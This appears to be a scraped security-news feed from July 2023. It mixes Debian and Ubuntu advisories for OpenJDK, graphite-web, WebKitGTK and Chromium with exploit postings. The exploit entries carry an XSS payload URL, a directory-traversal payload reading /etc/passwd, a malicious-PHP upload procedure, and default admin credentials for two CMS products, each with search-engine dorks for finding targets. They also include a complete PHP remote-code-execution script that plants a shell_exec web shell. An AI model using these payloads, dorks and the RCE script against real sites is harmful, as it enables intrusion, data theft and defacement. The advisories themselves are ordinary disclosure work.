Debian Linux Security Advisory 5458-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in bypass of sandbox restrictions, information disclosure, reduced cryptographic strength of the AES implementation, directory traversal or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5458-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 25, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-17CVE ID         : CVE-2023-22006 CVE-2023-22036 CVE-2023-22041 CVE-2023-22044                  CVE-2023-22045 CVE-2023-22049Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in bypass of sandbox restrictions, informationdisclosure, reduced cryptographic strength of the AES implementation,directory traversal or denial of service.For the oldstable distribution (bullseye) additional build dependenciesneed to be backported, a fixed package will be provided when these areready as 17.0.8+7-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 17.0.8+7-1~deb12u1.We recommend that you upgrade your openjdk-17 packages.For the detailed security status of openjdk-17 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-17Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTAGOoACgkQEMKTtsN8Tjb8nRAAvq9DlNtduOec61Hw9i0O8plyHPvMGuz7iG9usczk95ENCOfasp/VbIF4pqCSnwVwbSF02vSiodXETzjiK9+qHYHGiXCQ8j0U/Tiav5/wcx9O9h1CIhcuEsMp7pULUjSq52kh3wbTf7/UU8ogiSTxjZ6GY6wrEJJC6GnjKc3SAyc/D1uo85mG2ubkkD/G1w9V0egcCiopo/DejU/zzrTMc0/SiG3xksA8cmCICu0R2hvY6vLASZ42qwO3DYtWEQE4imDsUhhw3fXOs4zxT5mbLVZd2wO8+S7LY3y6uiEXL44inYHugljnG/0kea3NjiUPIm0ffdaq9DMYfoGHvho5tiFTMF5Y9p7Llhl0mZ13B2IS+tyADBuJhTmcp4JaB0Ls95w6ZU9LCMLIN9TBjBOK2r0i25oiNmgxlvg/ZJ3+S3L6oUypAFLYokNxvFCt/04mWsVdYZir32zD7sZ2jqk0ehqF6aMLPBqvLc/ic89oZXg+mcsXdB54wsnAorLo5H5ZN5P6yEJ9tILFlOPanUewZCr8oWmJkTe8ogYEQIkUkryXxD5GF3lAfpxsbmLKNvFe5sWloXJEvCm9CzBkmoJtAsgAyNY5O2gQwEG6gna6t5sKN0cYK5+LXK8fPWSkXLDYqgUSVeJGL+V0aU2wE5qTfovbv8nH30IoEB6kSBofv+k==Fjqe-----END PGP SIGNATURE-----

Debian Security Advisory 5458-1

Ubuntu Security Notice 6243-1 - It was discovered that Graphite-Web incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform server-side request forgery and obtain sensitive information. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. It was discovered that Graphite-Web incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform cross site scripting and obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6243-1  
July 25, 2023

graphite-web vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Graphite-Web.

Software Description:  
- graphite-web: A highly scalable real-time graphing system

Details:

It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to perform  
server-side request forgery and obtain sensitive information. This issue  
only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2017-18638)

It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to perform  
cross site scripting and obtain sensitive information. (CVE-2022-4728,  
CVE-2022-4729, CVE-2022-4730)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   graphite-web                    1.1.8-1ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   graphite-web                    1.1.4-5ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    1.0.2+debian-2ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    0.9.15+debian-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    0.9.12+debian-3ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6243-1  
   CVE-2017-18638, CVE-2022-4728, CVE-2022-4729, CVE-2022-4730

Package Information:  
   https://launchpad.net/ubuntu/+source/graphite-web/1.1.8-1ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/graphite-web/1.1.4-5ubuntu0.1

Ubuntu Security Notice USN-6243-1

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

Posted Jul 25, 2023

Authored by indoushka

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 13a1ca560e74613eb2d4517f0addb6da665a264ecdfd2a0a3388354bd3480ea9

Download | Favorite | View

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

 ====================================================================================================================================| # Title : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://kingcomposer.com/ | ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee>Hacked by indoushka</marquee>[+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee>Hacked by indoushka</marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

* ActiveX (932)
* Advisory (81,749)
* Arbitrary (16,156)
* BBS (2,859)
* Bypass (1,735)
* CGI (1,025)
* Code Execution (7,240)
* Conference (679)
* Cracker (841)
* CSRF (3,335)
* DoS (23,366)
* Encryption (2,365)
* Exploit (51,659)
* File Inclusion (4,213)
* File Upload (967)
* Firewall (821)
* Info Disclosure (2,756)
* Intrusion Detection (891)
* Java (3,036)
* JavaScript (851)
* Kernel (6,644)
* Local (14,428)
* Magazine (586)
* Overflow (12,666)
* Perl (1,423)
* PHP (5,139)
* Proof of Concept (2,338)
* Protocol (3,583)
* Python (1,531)
* Remote (30,674)
* Root (3,576)
* Rootkit (508)
* Ruby (612)
* Scanner (1,638)
* Security Tool (7,877)
* Shell (3,177)
* Shellcode (1,212)
* Sniffer (894)
* Spoof (2,196)
* SQL Injection (16,312)
* TCP (2,397)
* Trojan (687)
* UDP (885)
* Virus (664)
* Vulnerability (31,716)
* Web (9,624)
* Whitepaper (3,748)
* x86 (961)
* XSS (17,879)
* Other

**File Archives**

* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* August 2022
* Older

**Systems**

* AIX (428)
* Apple (1,995)
* BSD (373)
* CentOS (57)
* Cisco (1,922)
* Debian (6,794)
* Fedora (1,691)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (349)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,251)
* Mac OS X (685)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (484)
* RedHat (13,603)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,760)
* UNIX (9,270)
* UnixWare (186)
* Windows (6,565)
* Other

WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting

Debian Linux Security Advisory 5457-1 - An anonymous researcher discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5457-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
July 22, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-37450

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-37450

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution. Apple is aware of a report that  
    this issue may have been actively exploited.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.40.3-2~deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.40.3-2~deb12u2.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmS7l4cACgkQAAyEYu0C  
2AJr/BAAnyKHOHxiOroDoQHyo/DrX4rS7UTRb3TQKmgxxlehEAm40lO7jMTG1HLD  
HW8v7Jk9dguaqD4pV09rR3lfFrHb24jzyPZs07sQ3m1c9JQUXJybcsCkbLZlXH/V  
BHiv/oUjLK6FW4lHzhx3YjJ1kw9V9w5VO1neTjP4N9PK9TSGmZyPeHFlWG/Rq9fN  
jDU2PdS48TZK3enBfGEcaKOUcdxUsqWIIRh8nJY1EXVXUpmujjb8oJEHltNlSoe7  
NGmaWsPmpRz71JYkFVzRRwcxqa1UEi4abMy9VHzPgcGomLXESbDhlZYGLPMmhV5s  
lV6w73j1qDTpDZrsB7klm/MoABkqED6gwg1GktwmOFC07hC2PQt1Kd5ubQGX041k  
0XCKf+JavPDsYgN2FV9BsuOvDXJX2hf21jcgw/M7nX0byVEpG+rZrzdecEPMND8I  
+v0Lugs8D+Zg/80QaVqhA1hTQcwJgZVDn2GhB+8GfB4i0zhERHugkQsjCMIgkeh3  
XQw8dXixJNCCG3S6G63lJaRgKyw2lDlG1yYuEgQlXvxsopIHc9Itt71sPgTd5Fsk  
nvXiwMRkuqmytbOIcfaaIqPAe146l6O22sGICeYU59GdoEWcSstQCO6Gd1PJDJ8I  
8h4IFTwxPGbVq5WIyX8mogK/n8FTPb788HrYcK/NLcCu5Kh23xY=  
=g6Fh  
-----END PGP SIGNATURE-----

Debian Security Advisory 5457-1

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

Posted Jul 24, 2023

Authored by indoushka

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | 687fc9626b0a4c7e675cd7007c558b29ceea1784dee6326f9ae2ef2465dc6ffe

Download | Favorite | View

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

 ====================================================================================================================================| # Title : CMS Ultimate Solutions DreamSus v1.4 unrestricted file upload Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : http://dreamsus.com | | # Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] http://127.0.0.1/spcollegejejurieduin/add_testimonial.php <==== Fill in the blanks and choose your malicious file and upload[+] http://127.0.0.1/spcollegejejurieduin/uploads/testimonial/Ev!l.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================

**File Tags**

* ActiveX (932)
* Advisory (81,739)
* Arbitrary (16,155)
* BBS (2,859)
* Bypass (1,735)
* CGI (1,025)
* Code Execution (7,238)
* Conference (679)
* Cracker (841)
* CSRF (3,334)
* DoS (23,364)
* Encryption (2,365)
* Exploit (51,634)
* File Inclusion (4,209)
* File Upload (967)
* Firewall (821)
* Info Disclosure (2,755)
* Intrusion Detection (891)
* Java (3,036)
* JavaScript (851)
* Kernel (6,641)
* Local (14,428)
* Magazine (586)
* Overflow (12,666)
* Perl (1,423)
* PHP (5,138)
* Proof of Concept (2,337)
* Protocol (3,583)
* Python (1,531)
* Remote (30,666)
* Root (3,575)
* Rootkit (508)
* Ruby (612)
* Scanner (1,637)
* Security Tool (7,876)
* Shell (3,177)
* Shellcode (1,212)
* Sniffer (894)
* Spoof (2,196)
* SQL Injection (16,307)
* TCP (2,397)
* Trojan (687)
* UDP (885)
* Virus (664)
* Vulnerability (31,711)
* Web (9,622)
* Whitepaper (3,748)
* x86 (961)
* XSS (17,866)
* Other

**File Archives**

* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* August 2022
* Older

**Systems**

* AIX (428)
* Apple (1,994)
* BSD (373)
* CentOS (57)
* Cisco (1,922)
* Debian (6,794)
* Fedora (1,691)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (349)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,241)
* Mac OS X (685)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (484)
* RedHat (13,599)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,755)
* UNIX (9,269)
* UnixWare (186)
* Windows (6,565)
* Other

CMS Ultimate Solutions DreamSus 1.4 Shell Upload

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

**CMS NEXIN 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 25b10702af932a169c8f962ba428cb35c1dcfb81a0c4d0c73e21de4f9e2d2054

Download | Favorite | View

**CMS NEXIN 2.0 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS NEXIN engine v2.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : NEXIN engine v2.0                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://wlugashotelcom/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS NEXIN 2.0 Insecure Settings

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | ef0029a51004a0f4fd1207577f144340dffe6a0657f6ace9160fd98579a7d596

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings

Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /add_post_sql.php.

<?php
 /*
 Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
 Date: 12/05/2023
 Exploit Author: Chokri Hammedi
 Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
 Software Link: https://github.com/thrsrossi/Millhouse-Project.git
 Version: 1.414
 Tested on: Debian
 CVE: N/A
 */
 
 
 $options = getopt('u:c:');
 
 if(!isset($options['u'], $options['c']))
 die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
 \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
 \033[0m\n
 \n");
 
 $target = $options['u'];
 
 $command = $options['c'];
 
 $url = $target . '/includes/add_post_sql.php';
 
 
 $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
 Content-Disposition: form-data; name="title"
 
 helloworld
 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
 Content-Disposition: form-data; name="description"
 
 sdsdsds
 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
 Content-Disposition: form-data; name="files"; filename=""
 Content-Type: application/octet-stream
 
 
 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
 Content-Disposition: form-data; name="category"
 
 1
 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
 Content-Disposition: form-data; name="image"; filename="rose.php"
 Content-Type: application/x-php
 
 <?php
 $shell = shell_exec("' . $command . '");
 echo $shell;
 ?>
 
 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
 ';
 
 $headers = array(
 'Content-Type: multipart/form-data;
 boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
 'Cookie: PHPSESSID=rose1337',
 );
 
 $ch = curl_init($url);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 curl_setopt($ch, CURLOPT_POST, true);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_HEADER, true);
 
 $response = curl_exec($ch);
 curl_close($ch);
 
 // execute command
 
 $shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
 $ch = curl_init($shell);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $exec_shell = curl_exec($ch);
 curl_close($ch);
 echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
 
 ?>

CVE-2023-37165: OffSec’s Exploit Database Archive

Debian Linux Security Advisory 5456-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5456-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 20, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3727 CVE-2023-3728 CVE-2023-3730 CVE-2023-3732                  CVE-2023-3733 CVE-2023-3734 CVE-2023-3735 CVE-2023-3736                  CVE-2023-3737 CVE-2023-3738 CVE-2023-3740Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 115.0.5790.98-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.0.5790.98-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmS5GUwACgkQEMKTtsN8TjbbTQ/+JTOxjogNUPA3QsV16IWwpWLkSoQkfVxKbreF8i5OC/FRN/nWdvH0gN8ZJI0f9UKhAjaSVAlQ9j4K7L54V4uEXuNWrnNtRDJx24RS6oZ5Wmd301IC0My1qpTRic3vd8Rfc7J9B1lvae9fNAmQlG11X090Pg3nxgaHNWF0qzh4HZcb97rp/TLBmuQLTjnB7jM9y/IBZxKQwoZXGERRWV5UGkp1YtJgNizZhlwkG6MpP6erSFrWOpMokEU44N0WWZKXoZr2xGkc7XIrAumJ5b5+1y+kjCBUVfrnNZl14T+LMz8k45CuDvfCq7FFfDhpS7z/Rrb0SsepBKwzSHB54nmexCLbtkycExwGQ2C5KLNtmjL435V2D65iaCsBdceMtqlGFsGgjZIY2wcYYdSh1lLGqKseoHKGrnSLpwAEuG/Lj+51IQFZ4n1erVCuBbObmWTySoU/cwWmryelWbo9ILiME2y2BwGTYiW1+VGndPBUwG9jgswaFf3Oo9VTSD/olDaD9CbtrnIHS/HrrCLtopDoYqLYcyrQzh++JV5pLkJQD7q90kApBKpw/iI2qVmlHCPUNjAK5AqYS/BDe6XC2rju0+dOyoZ8oSAhzusihLCHhbxYrjpNck8qy+7Zn4XvY5mWXQmfBpf+7o6s5S586Zhd9rsdtgMqBViRWUacSX82Q7I==Hx+R-----END PGP SIGNATURE-----

Tag

#debian